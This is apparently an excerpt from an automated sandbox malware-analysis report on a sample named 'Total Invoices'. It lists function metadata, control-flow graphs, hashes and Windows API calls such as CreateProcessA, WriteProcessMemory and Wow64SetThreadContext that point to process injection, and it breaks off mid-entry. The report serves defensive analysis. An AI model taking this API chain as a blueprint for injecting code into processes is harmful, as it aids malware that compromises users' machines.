de43e92-de43ec4 454->461 455->371 460->455 461->460
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1739611139.000000000DE40000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DE40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_de40000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @"5$L"5$L"5$P#5$P#5$P#5$P#5
                                                                                        • API String ID: 0-3566619598
                                                                                        • Opcode ID: 66dbbad4a2912cbf641e76fdad9f57593a5086f9ad0f4254b8726375bd8e49a3
                                                                                        • Instruction ID: 59bc6f4973065dc2575766aed9d8e12aaecbe1efac361ab1b12010279520c6b0
                                                                                        • Opcode Fuzzy Hash: 66dbbad4a2912cbf641e76fdad9f57593a5086f9ad0f4254b8726375bd8e49a3
                                                                                        • Instruction Fuzzy Hash: E032AA34B412058FDB19DB79E554BAEB7F6AF88704F2484A9E106AB3A0CF35ED01CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED051 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 469 15ed051-15ed0ef GetCurrentProcess 473 15ed0f8-15ed12c GetCurrentThread 469->473 474 15ed0f1-15ed0f7 469->474 475 15ed12e-15ed134 473->475 476 15ed135-15ed169 GetCurrentProcess 473->476 474->473 475->476 478 15ed16b-15ed171 476->478 479 15ed172-15ed18d call 15ed638 476->479 478->479 482 15ed193-15ed1c2 GetCurrentThreadId 479->482 483 15ed1cb-15ed22d 482->483 484 15ed1c4-15ed1ca 482->484 484->483
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 015ED11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 015ED1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 6c2610ceb10b56c0b40238e8b7976c5fa21b7b6dacef9077fdcd51e612d3b142
                                                                                        • Instruction ID: 408b7c6772234c12f082d0f824bfe5a29f27a6d4eb86d47d8647a5506a593b86
                                                                                        • Opcode Fuzzy Hash: 6c2610ceb10b56c0b40238e8b7976c5fa21b7b6dacef9077fdcd51e612d3b142
                                                                                        • Instruction Fuzzy Hash: 6C5166B0D00249CFDB18DFA9D648BAEBBF1BF88314F208459D019AB260DB359885CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED060 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 491 15ed060-15ed0ef GetCurrentProcess 495 15ed0f8-15ed12c GetCurrentThread 491->495 496 15ed0f1-15ed0f7 491->496 497 15ed12e-15ed134 495->497 498 15ed135-15ed169 GetCurrentProcess 495->498 496->495 497->498 500 15ed16b-15ed171 498->500 501 15ed172-15ed18d call 15ed638 498->501 500->501 504 15ed193-15ed1c2 GetCurrentThreadId 501->504 505 15ed1cb-15ed22d 504->505 506 15ed1c4-15ed1ca 504->506 506->505
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED0DE
                                                                                        • GetCurrentThread.KERNEL32 ref: 015ED11B
                                                                                        • GetCurrentProcess.KERNEL32 ref: 015ED158
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 015ED1B1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: Current$ProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2063062207-0
                                                                                        • Opcode ID: 0a3f2784571ff52571bb22a8a0dda87147c00a6641b559640324caa5590e8924
                                                                                        • Instruction ID: 762af5910ed9226d4d23ffe8e29ac45c278b32526509c9ff54194bc2a921a9be
                                                                                        • Opcode Fuzzy Hash: 0a3f2784571ff52571bb22a8a0dda87147c00a6641b559640324caa5590e8924
                                                                                        • Instruction Fuzzy Hash: 735134B0D00249CFDB58DFAAD648B9EBBF1FB88314F208459D419AB360DB349985CF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDDC4 Relevance: 1.7, APIs: 1, Instructions: 246processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 640 7adddc4-7adde65 642 7adde9e-7addebe 640->642 643 7adde67-7adde71 640->643 648 7addef7-7addf26 642->648 649 7addec0-7addeca 642->649 643->642 644 7adde73-7adde75 643->644 646 7adde98-7adde9b 644->646 647 7adde77-7adde81 644->647 646->642 650 7adde85-7adde94 647->650 651 7adde83 647->651 659 7addf5f-7ade019 CreateProcessA 648->659 660 7addf28-7addf32 648->660 649->648 652 7addecc-7addece 649->652 650->650 653 7adde96 650->653 651->650 654 7addef1-7addef4 652->654 655 7added0-7addeda 652->655 653->646 654->648 657 7addedc 655->657 658 7addede-7addeed 655->658 657->658 658->658 661 7addeef 658->661 671 7ade01b-7ade021 659->671 672 7ade022-7ade0a8 659->672 660->659 662 7addf34-7addf36 660->662 661->654 663 7addf59-7addf5c 662->663 664 7addf38-7addf42 662->664 663->659 666 7addf44 664->666 667 7addf46-7addf55 664->667 666->667 667->667 668 7addf57 667->668 668->663 671->672 682 7ade0b8-7ade0bc 672->682 683 7ade0aa-7ade0ae 672->683 685 7ade0cc-7ade0d0 682->685 686 7ade0be-7ade0c2 682->686 683->682 684 7ade0b0 683->684 684->682 688 7ade0e0-7ade0e4 685->688 689 7ade0d2-7ade0d6 685->689 686->685 687 7ade0c4 686->687 687->685 691 7ade0f6-7ade0fd 688->691 692 7ade0e6-7ade0ec 688->692 689->688 690 7ade0d8 689->690 690->688 693 7ade0ff-7ade10e 691->693 694 7ade114 691->694 692->691 693->694 696 7ade115 694->696 696->696
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ADE006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 65fadfa270353b347e6f3c88948fff857ddeb63e6dd34991bb5e60182be7e39b
                                                                                        • Instruction ID: b71d961253425cba0c113db5b021a106c869dbb3bf206331b17cfb34ff895bbd
                                                                                        • Opcode Fuzzy Hash: 65fadfa270353b347e6f3c88948fff857ddeb63e6dd34991bb5e60182be7e39b
                                                                                        • Instruction Fuzzy Hash: 85A16FB1D0025ADFDB14CF68C8407DDBBF2BF88314F1485AAE859A7284DB749985CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDDD0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 697 7adddd0-7adde65 699 7adde9e-7addebe 697->699 700 7adde67-7adde71 697->700 705 7addef7-7addf26 699->705 706 7addec0-7addeca 699->706 700->699 701 7adde73-7adde75 700->701 703 7adde98-7adde9b 701->703 704 7adde77-7adde81 701->704 703->699 707 7adde85-7adde94 704->707 708 7adde83 704->708 716 7addf5f-7ade019 CreateProcessA 705->716 717 7addf28-7addf32 705->717 706->705 709 7addecc-7addece 706->709 707->707 710 7adde96 707->710 708->707 711 7addef1-7addef4 709->711 712 7added0-7addeda 709->712 710->703 711->705 714 7addedc 712->714 715 7addede-7addeed 712->715 714->715 715->715 718 7addeef 715->718 728 7ade01b-7ade021 716->728 729 7ade022-7ade0a8 716->729 717->716 719 7addf34-7addf36 717->719 718->711 720 7addf59-7addf5c 719->720 721 7addf38-7addf42 719->721 720->716 723 7addf44 721->723 724 7addf46-7addf55 721->724 723->724 724->724 725 7addf57 724->725 725->720 728->729 739 7ade0b8-7ade0bc 729->739 740 7ade0aa-7ade0ae 729->740 742 7ade0cc-7ade0d0 739->742 743 7ade0be-7ade0c2 739->743 740->739 741 7ade0b0 740->741 741->739 745 7ade0e0-7ade0e4 742->745 746 7ade0d2-7ade0d6 742->746 743->742 744 7ade0c4 743->744 744->742 748 7ade0f6-7ade0fd 745->748 749 7ade0e6-7ade0ec 745->749 746->745 747 7ade0d8 746->747 747->745 750 7ade0ff-7ade10e 748->750 751 7ade114 748->751 749->748 750->751 753 7ade115 751->753 753->753
                                                                                        APIs
                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07ADE006
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcess
                                                                                        • String ID:
                                                                                        • API String ID: 963392458-0
                                                                                        • Opcode ID: 67fb5927aba7c0c68b2b48b44c525db762653b047f1ce81a069dc5c14e70083b
                                                                                        • Instruction ID: cbee16c394cad2161951dc78968f0f62288e881174a95b394c9f6cb345bcbdac
                                                                                        • Opcode Fuzzy Hash: 67fb5927aba7c0c68b2b48b44c525db762653b047f1ce81a069dc5c14e70083b
                                                                                        • Instruction Fuzzy Hash: 5E916EB1D0021ADFDB14CF69C8407DDBBB2BF88314F1485AAE819A7254DB749D85CF92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015EADC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 754 15eadc8-15eadd7 755 15eadd9-15eade6 call 15ea0ec 754->755 756 15eae03-15eae07 754->756 763 15eadfc 755->763 764 15eade8 755->764 758 15eae1b-15eae5c 756->758 759 15eae09-15eae13 756->759 765 15eae5e-15eae66 758->765 766 15eae69-15eae77 758->766 759->758 763->756 809 15eadee call 15eb060 764->809 810 15eadee call 15eb051 764->810 765->766 767 15eae9b-15eae9d 766->767 768 15eae79-15eae7e 766->768 773 15eaea0-15eaea7 767->773 770 15eae89 768->770 771 15eae80-15eae87 call 15ea0f8 768->771 769 15eadf4-15eadf6 769->763 772 15eaf38-15eaff8 769->772 777 15eae8b-15eae99 770->777 771->777 804 15eaffa-15eaffd 772->804 805 15eb000-15eb02b GetModuleHandleW 772->805 774 15eaea9-15eaeb1 773->774 775 15eaeb4-15eaebb 773->775 774->775 778 15eaebd-15eaec5 775->778 779 15eaec8-15eaeca call 15ea108 775->779 777->773 778->779 783 15eaecf-15eaed1 779->783 785 15eaede-15eaee3 783->785 786 15eaed3-15eaedb 783->786 787 15eaee5-15eaeec 785->787 788 15eaf01-15eaf0e 785->788 786->785 787->788 790 15eaeee-15eaefe call 15ea118 call 15ea128 787->790 794 15eaf10-15eaf2e 788->794 795 15eaf31-15eaf37 788->795 790->788 794->795 804->805 806 15eb02d-15eb033 805->806 807 15eb034-15eb048 805->807 806->807 809->769 810->769
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 015EB01E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleModule
                                                                                        • String ID:
                                                                                        • API String ID: 4139908857-0
                                                                                        • Opcode ID: b2f7b2794a8f829edf4f545fe57df4f332c5623789094897e3119c5640ce4ae5
                                                                                        • Instruction ID: 85f6fb9c033ff225b4ae1ba39183a44aa8a0b6891f5df45cbb3b485324ba0314
                                                                                        • Opcode Fuzzy Hash: b2f7b2794a8f829edf4f545fe57df4f332c5623789094897e3119c5640ce4ae5
                                                                                        • Instruction Fuzzy Hash: CF712370A00B068FDB28DF79D55875ABBF1BF88300F008A2DD49ADBA50D775E949CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015E590C Relevance: 1.6, APIs: 1, Instructions: 102COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 811 15e590c-15e59d9 CreateActCtxA 813 15e59db-15e59e1 811->813 814 15e59e2-15e5a3c 811->814 813->814 821 15e5a3e-15e5a41 814->821 822 15e5a4b-15e5a4f 814->822 821->822 823 15e5a60 822->823 824 15e5a51-15e5a5d 822->824 825 15e5a61 823->825 824->823 825->825
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015E59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: b3fd0900970ec540d92e59320a7dc96462ff1c7a06d831e0b8bd492333a23a76
                                                                                        • Instruction ID: 146fd31d686667f4387768e08ad517259e3cb11ff44cc4b9644567c2c3f692cc
                                                                                        • Opcode Fuzzy Hash: b3fd0900970ec540d92e59320a7dc96462ff1c7a06d831e0b8bd492333a23a76
                                                                                        • Instruction Fuzzy Hash: D241F1B4C00719CFDB24CFA9C884ADEBBF5BF49304F24816AD408AB255DB756985CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015E44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 827 15e44b4-15e59d9 CreateActCtxA 830 15e59db-15e59e1 827->830 831 15e59e2-15e5a3c 827->831 830->831 838 15e5a3e-15e5a41 831->838 839 15e5a4b-15e5a4f 831->839 838->839 840 15e5a60 839->840 841 15e5a51-15e5a5d 839->841 842 15e5a61 840->842 841->840 842->842
                                                                                        APIs
                                                                                        • CreateActCtxA.KERNEL32(?), ref: 015E59C9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: Create
                                                                                        • String ID:
                                                                                        • API String ID: 2289755597-0
                                                                                        • Opcode ID: 5dec6ff5bf65f123c7d0431d94cab799645e8252f15372ddf2b66481532d78e5
                                                                                        • Instruction ID: e617aa8de1f33ab9a6d7f405c8d5bdaf7388a6ce78017787cd8fe28822cf9b8d
                                                                                        • Opcode Fuzzy Hash: 5dec6ff5bf65f123c7d0431d94cab799645e8252f15372ddf2b66481532d78e5
                                                                                        • Instruction Fuzzy Hash: 2A41D2B4C1071DCBDB24CFA9C9446DDBBF5BF49304F24806AD408AB255EBB56945CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDB48 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 854 7addb48-7addb96 856 7addb98-7addba4 854->856 857 7addba6-7addbe5 WriteProcessMemory 854->857 856->857 859 7addbee-7addc1e 857->859 860 7addbe7-7addbed 857->860 860->859
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07ADDBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 588741e09a68cb49c12927f6a302f33ab82397c3f36615100552e4033f17ed9e
                                                                                        • Instruction ID: 7d11caa299aadf212f0f7cedcccedad3b40b357fcf53a3386a728da563a93728
                                                                                        • Opcode Fuzzy Hash: 588741e09a68cb49c12927f6a302f33ab82397c3f36615100552e4033f17ed9e
                                                                                        • Instruction Fuzzy Hash: 192139B59003599FCB10DFA9C885BDEBBF5FF88314F10842AE959A7250C778A944CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDB40 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 844 7addb40-7addb96 846 7addb98-7addba4 844->846 847 7addba6-7addbe5 WriteProcessMemory 844->847 846->847 849 7addbee-7addc1e 847->849 850 7addbe7-7addbed 847->850 850->849
                                                                                        APIs
                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07ADDBD8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessWrite
                                                                                        • String ID:
                                                                                        • API String ID: 3559483778-0
                                                                                        • Opcode ID: 247eb2e1c4f2b7449c383ac2a3942ac11986df6bc0ce9e3a591bd3813badf33b
                                                                                        • Instruction ID: 7fcaa18840970db9d7858cbc69c17594e56bf2a20c455f33ca9d12f12d9ad0f5
                                                                                        • Opcode Fuzzy Hash: 247eb2e1c4f2b7449c383ac2a3942ac11986df6bc0ce9e3a591bd3813badf33b
                                                                                        • Instruction Fuzzy Hash: 222177B69003599FCB00CFA9C881BDEBBF1FF88314F10842AE919A7240C7789940CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADD570 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07ADD5F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: 1b0eeff700febc146a2ef28541d535202ce660771cd5935ebb7be859a263a243
                                                                                        • Instruction ID: e7e767839dcdfacb48a56ac7b8f1999944e02137d7718becf0720f88ec89f810
                                                                                        • Opcode Fuzzy Hash: 1b0eeff700febc146a2ef28541d535202ce660771cd5935ebb7be859a263a243
                                                                                        • Instruction Fuzzy Hash: 322149B5D003498FDB10DFA9C5857EEBFF4AF88314F54842AD469A7240C7789984CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADD578 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07ADD5F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: ContextThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 983334009-0
                                                                                        • Opcode ID: a4527c6cb221bce3a946fe4e11d44e8fbf018b8ad29ddd1c21434d9fbc85bfb8
                                                                                        • Instruction ID: 20ca23c4bb686a1a980bf46ecfeed7ca45fbb09afc1802263b7d0b9f3ec2e5f0
                                                                                        • Opcode Fuzzy Hash: a4527c6cb221bce3a946fe4e11d44e8fbf018b8ad29ddd1c21434d9fbc85bfb8
                                                                                        • Instruction Fuzzy Hash: E42149B1D003498FDB10DFAAC4857EEBBF4EF88324F10842AD459A7240CB789944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDC38 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ADDCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 5c3bcc173be12ca469d331a1852468f0e86c2119bef76700e7941dccabf362c8
                                                                                        • Instruction ID: a957aca88883641050052260ff8912e7ba4225e03abbf140dff8bf859c58e83d
                                                                                        • Opcode Fuzzy Hash: 5c3bcc173be12ca469d331a1852468f0e86c2119bef76700e7941dccabf362c8
                                                                                        • Instruction Fuzzy Hash: 4C2109B1D003599FCB10DFAAC945ADEFBF5FF88310F10842AE559A7250C7749944CBA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDC31 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07ADDCB8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1737299283.0000000007AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AD0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ad0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: MemoryProcessRead
                                                                                        • String ID:
                                                                                        • API String ID: 1726664587-0
                                                                                        • Opcode ID: 7b1a0fbce22a9b75d080a3d49ef0e83a2a96a7bbce6fc31bb1a0a881a9da8fd2
                                                                                        • Instruction ID: b3adc240437a77766fba966a86986411b736ebb7eca26244bab9eadf0f5c9c34
                                                                                        • Opcode Fuzzy Hash: 7b1a0fbce22a9b75d080a3d49ef0e83a2a96a7bbce6fc31bb1a0a881a9da8fd2
                                                                                        • Instruction Fuzzy Hash: EC2114B19002599FCB10DFAAC981AEEBBF5FF48310F10842AE559A7250C7789944CBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED6B0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: a442d2ff8d9098cb7369d19c353b286138a03a31da1dca473abb55847bae799a
                                                                                        • Instruction ID: 086984400d3cd9cddebf5b453a4833a09bddd6538595b65221c49bb71aa801ee
                                                                                        • Opcode Fuzzy Hash: a442d2ff8d9098cb7369d19c353b286138a03a31da1dca473abb55847bae799a
                                                                                        • Instruction Fuzzy Hash: 3A21B3B5D002589FDB10CFAAD584ADEBBF8FB48310F14841AE954A7250D374A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015ED6A9 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015ED737
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: DuplicateHandle
                                                                                        • String ID:
                                                                                        • API String ID: 3793708945-0
                                                                                        • Opcode ID: 2a6cc639ed94b4f3640daffd6b269b545093675d032c00bb46abbd83c814a55f
                                                                                        • Instruction ID: 4c8c362ed69601a2ff7a850ad45f55c1113165cd17a4f0a117372c7b76fc1178
                                                                                        • Opcode Fuzzy Hash: 2a6cc639ed94b4f3640daffd6b269b545093675d032c00bb46abbd83c814a55f
                                                                                        • Instruction Fuzzy Hash: 2421E0B5D00259DFDB10CFAAD984AEEBBF4FB48320F14841AE958B7210C374A944CFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015EA150 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB099,00000800,00000000,00000000), ref: 015EB2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: b6bd24a64b23beeac2e5a4d09e0ae003bdab7100639f2338d19105b10e5750d4
                                                                                        • Instruction ID: 0ea1bde2b57dc0fb3d147b14189956792059ecd0a31ac374cf13a0747d6294af
                                                                                        • Opcode Fuzzy Hash: b6bd24a64b23beeac2e5a4d09e0ae003bdab7100639f2338d19105b10e5750d4
                                                                                        • Instruction Fuzzy Hash: E311E4B6D002499FDB14CF9AC448ADEFBF4FF88310F10842AD519AB210C375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 015EB238 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,015EB099,00000800,00000000,00000000), ref: 015EB2AA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1729310862.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_15e0000_Total Invoices.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 27c8f4d4f0b070a16aef2995d45ee915f8a2bc2a5979d0fe9df9b5997f08b34d
                                                                                        • Instruction ID: e36c3a6e3f9255e5133cfa747ab2deabe6aac57cacf370d0cd52c3eead0173ae
                                                                                        • Opcode Fuzzy Hash: 27c8f4d4f0b070a16aef2995d45ee915f8a2bc2a5979d0fe9df9b5997f08b34d
                                                                                        • Instruction Fuzzy Hash: 9811D0B6D003499FDB14CFAAC448A9EBBF4AF88320F14842AD519AB210C375A945CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 07ADDA88 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07ADDAF6
                                                                                        Memory Dump Source
